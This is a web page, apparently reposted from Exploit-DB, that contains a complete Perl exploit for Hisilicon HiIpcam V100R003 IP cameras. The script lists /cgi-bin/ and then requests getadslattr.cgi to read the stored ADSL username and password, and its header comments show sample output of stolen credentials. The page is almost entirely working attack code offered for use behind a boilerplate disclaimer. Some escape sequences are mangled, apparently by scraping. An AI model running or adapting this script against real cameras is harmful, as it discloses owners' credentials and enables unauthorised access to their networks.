Exploit/Advisories
Published on September 23rd, 2019 📆 | 3428 Views ⚑
0Hisilicon HiIpcam V100R003 Remote ADSL – Credentials Disclosure
#!/usr/bin/perl -w
#
# Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
#
# Copyright 2019 (c) Todor Donev
#
#
# # [
# # [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
# # [ =============================================================
# # [ Exploit Author: Todor Donev 2019
# # [
# # [ Disclaimer:
# # [ This or previous programs are for Educational purpose
# # [ ONLY. Do not use it without permission. The usual
# # [ disclaimer applies, especially the fact that Todor Donev
# # [ is not liable for any damages caused by direct or
# # [ indirect use of the information or functionality provided
# # [ by these programs. The author or any Internet provider
# # [ bears NO responsibility for content or misuse of these
# # [ programs or any derivatives thereof. By using these programs
# # [ you accept the fact that any damage (dataloss, system crash,
# # [ system compromise, etc.) caused by the use of these programs
# # [ are not Todor Donev's responsibility.
# # [
# # [ Use them at your own risk!
# # [
# # [ Initializing the browser
# # [ Server: thttpd/2.25b 29dec2003
# # [ The target is vulnerable
# # [
# # [ Directory Traversal
# # [
# # [ /cgi-bin/..
# # [ /cgi-bin/adsl_init.cgi
# # [ /cgi-bin/chkwifi.cgi
# # [ /cgi-bin/ddns_start.cgi
# # [ /cgi-bin/getadslattr.cgi
# # [ /cgi-bin/getddnsattr.cgi
# # [ /cgi-bin/getinetattr.cgi
# # [ /cgi-bin/getinterip.cgi
# # [ /cgi-bin/getnettype.cgi
# # [ /cgi-bin/getupnp.cgi
# # [ /cgi-bin/getwifi.cgi
# # [ /cgi-bin/getwifiattr.cgi
# # [ /cgi-bin/ptzctrldown.cgi
# # [ /cgi-bin/ptzctrlleft.cgi
# # [ /cgi-bin/ptzctrlright.cgi
# # [ /cgi-bin/ptzctrlup.cgi
# # [ /cgi-bin/ptzctrlzoomin.cgi
# # [ /cgi-bin/ptzctrlzoomout.cgi
# # [ /cgi-bin/ser.cgi
# # [ /cgi-bin/setadslattr.cgi
# # [ /cgi-bin/setddnsattr.cgi
# # [ /cgi-bin/setinetattr.cgi
# # [ /cgi-bin/setwifiattr.cgi
# # [ /cgi-bin/testwifi.cgi
# # [ /cgi-bin/upnp_start.cgi
# # [ /cgi-bin/upnp_stop.cgi
# # [ /cgi-bin/wifi_start.cgi
# # [ /cgi-bin/wifi_stop.cgi
# # [
# # [ File Reading
# # [
# # [ var ip = "" ;
# # [ var adslenable = "" ;
# # [ var username = "hacker" ;
# # [ var password = "133337" ;
# # [ var dnsauto = "1" ;
# # [ var dns1 = "8.8.8.8" ;
# # [ var dns2 = "8.8.4.4" ;
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
$| = 1;
my $host = shift || 'https://192.168.1.1/'; # Full path url to the store
print "33[2J"; #clear the screen
print "33[0;0H"; #jump to 0,0
my $banner = "x5bx20x0ax5bx20x48x69x73x69x6cx69x63x6fx6ex20x48x69x49x70x63x61x6dx20x56x31x30x30x52x30x30x33x20x52x65x6dx6fx74x65x20x41x44x53x4cx20x43x72x65x64x65x6ex74x69x61x6cx73x20x44x69x73x63x6cx6fx73x75x72x65x0ax5bx20x3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx0ax5bx20x45x78x70x6cx6fx69x74x20x41x75x74x68x6fx72x3ax20x54x6fx64x6fx72x20x44x6fx6ex65x76x20x32x30x31x39x20x3cx74x6fx64x6fx72x2ex64x6fx6ex65x76x40x67x6dx61x69x6cx2ex63x6fx6dx3ex0ax5bx0ax5bx20x20x44x69x73x63x6cx61x69x6dx65x72x3ax0ax5bx20x20x54x68x69x73x20x6fx72x20x70x72x65x76x69x6fx75x73x20x70x72x6fx67x72x61x6dx73x20x61x72x65x20x66x6fx72x20x45x64x75x63x61x74x69x6fx6ex61x6cx20x70x75x72x70x6fx73x65x0ax5bx20x20x4fx4ex4cx59x2ex20x44x6fx20x6ex6fx74x20x75x73x65x20x69x74x20x77x69x74x68x6fx75x74x20x70x65x72x6dx69x73x73x69x6fx6ex2ex20x54x68x65x20x75x73x75x61x6cx20x0ax5bx20x20x64x69x73x63x6cx61x69x6dx65x72x20x61x70x70x6cx69x65x73x2cx20x65x73x70x65x63x69x61x6cx6cx79x20x74x68x65x20x66x61x63x74x20x74x68x61x74x20x54x6fx64x6fx72x20x44x6fx6ex65x76x0ax5bx20x20x69x73x20x6ex6fx74x20x6cx69x61x62x6cx65x20x66x6fx72x20x61x6ex79x20x64x61x6dx61x67x65x73x20x63x61x75x73x65x64x20x62x79x20x64x69x72x65x63x74x20x6fx72x20x0ax5bx20x20x69x6ex64x69x72x65x63x74x20x75x73x65x20x6fx66x20x74x68x65x20x20x69x6ex66x6fx72x6dx61x74x69x6fx6ex20x6fx72x20x66x75x6ex63x74x69x6fx6ex61x6cx69x74x79x20x70x72x6fx76x69x64x65x64x0ax5bx20x20x62x79x20x74x68x65x73x65x20x70x72x6fx67x72x61x6dx73x2ex20x54x68x65x20x61x75x74x68x6fx72x20x6fx72x20x61x6ex79x20x49x6ex74x65x72x6ex65x74x20x70x72x6fx76x69x64x65x72x20x0ax5bx20x20x62x65x61x72x73x20x4ex4fx20x72x65x73x70x6fx6ex73x69x62x69x6cx69x74x79x20x66x6fx72x20x63x6fx6ex74x65x6ex74x20x6fx72x20x6dx69x73x75x73x65x20x6fx66x20x74x68x65x73x65x20x0ax5bx20x20x70x72x6fx67x72x61x6dx73x20x6fx72x20x61x6ex79x20x64x65x72x69x76x61x74x69x76x65x73x20x74x68x65x72x65x6fx66x2ex20x42x79x20x75x73x69x6ex67x20x74x68x65x73x65x20x70x72x6fx67x72x61x6dx73x20x0ax5bx20x20x79x6fx75x20x61x63x63x65x70x74x20x74x68x65x20x66x61x63x74x20x74x68x61x74x20x61x6ex79x20x64x61x6dx61x67x65x20x28x64x61x74x61x6cx6fx73x73x2cx20x73x79x73x74x65x6dx20x63x72x61x73x68x2cx20x0ax5bx20x20x73x79x73x74x65x6dx20x63x6fx6dx70x72x6fx6dx69x73x65x2cx20x65x74x63x2ex29x20x63x61x75x73x65x64x20x62x79x20x74x68x65x20x75x73x65x20x20x6fx66x20x74x68x65x73x65x20x70x72x6fx67x72x61x6dx73x0ax5bx20x20x61x72x65x20x6ex6fx74x20x54x6fx64x6fx72x20x44x6fx6ex65x76x27x73x20x72x65x73x70x6fx6ex73x69x62x69x6cx69x74x79x2ex0ax5bx20x20x20x0ax5bx20x55x73x65x20x74x68x65x6dx20x61x74x20x79x6fx75x72x20x6fx77x6ex20x72x69x73x6bx21x0ax5bx0a";
print $banner;
print "[ e.g. perl $0 https://target:port/n" and exit if ($host !~ m/^http/);
print "[ Initializing the browsern";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
my $target = $host."/cgi-bin/";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ 401 Unauthorized!n" and exit if ($response->code eq '401');
print "[ Server: ", $response->header('Server'), "n";
if (defined ($response->as_string()) && ($response->as_string() =~ m/Index of /cgi-bin/
/)){
print "[ The target is vulnerablen";
print "[n[ Directory Traversaln";
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
my @files = $tree->look_down(_tag => 'a');
print "[ ", $_->attr('href'), "n" for @files;
my $target = $host."/cgi-bin/getadslattr.cgi";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[n[ File Readingn";
print "[ ", $_, "n" for split(/n/,$response->content());
} else {
print "[ Exploit failed! The target isn't vulnerablen";
exit;
}
https://www.exploit-db.com/exploits/47405
Gloss